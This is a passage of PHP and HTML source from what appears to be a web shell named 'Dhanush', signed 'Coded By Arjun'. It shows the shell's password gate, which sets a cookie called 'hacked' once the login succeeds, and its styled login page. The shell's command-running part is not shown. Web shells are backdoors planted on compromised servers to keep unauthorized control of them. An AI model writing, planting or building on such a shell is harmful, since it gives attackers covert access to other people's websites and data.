6184<hr color="#1B1B1B">
6185<div align="center">
6186<font size="6" face="Times New Roman, Times, serif" color="#00CC00">धनुष<br>
6187--==Coded By Arjun==--</font><br><a href="http://www.google.com/search?q=%E0%A4%9C%E0%A4%AF%20%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6" target="_blank"><font color="#FF0000" size="6">जय हिन्द</font></a></div>
6188<?php
6189}
6190}
6191
6192if(isset($_POST['uname']) && isset($_POST['passwd']))
6193{
6194 if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
6195 {
6196 setcookie("hacked", md5($pass));
6197 $selfenter = $_SERVER["PHP_SELF"];
6198 header("Location:$selfenter");
6199 }
6200}
6201
6202if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
6203{
6204 shellstyle();
6205?>
6206 <center>
6207 <form method="POST">
6208 <div style="background-color:#171717; width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px; background-image:url(Windows_7_-_Alien_from_outer_space.jpg);">
6209 <table cellpadding="9" cellspacing="4">
6210 <tr>
6211 <td align="center" colspan="2"><blink><font size="7"><b>Dhanush</b></font></blink></td>
6212 </tr>
6213 <tr>
6214 <td align="right"><b>User Name : </b></td>
6215 <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
6216 </tr>
6217 <tr>
6218 <td align="right"><b>Password : </b></td>
6219 <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
6220 </tr>
6221 <tr>
6222 <td align="center" colspan="2"><input type="submit" class="but" value=" Enter "></td>
6223 </tr>
6224 <tr>
6225 <td align="center" colspan="2"><font size="6" face="Times New Roman, Times, serif"><b>--==Coded By Arjun==--</b></font></td>
6226 </tr>
6227 <tr>
6228 <td colspan="2"><font size="4" face="Times New Roman, Times, serif"><noscript>Enable Javascript in your browser for the proper working of the shell</noscript></font></td>
6229 </tr>
6230 </table>
6231 </div>
6232
6233 </form>
6234 </center>
6235<br>
6236</body>
6237</html>
6238<?php
6239}
6240?>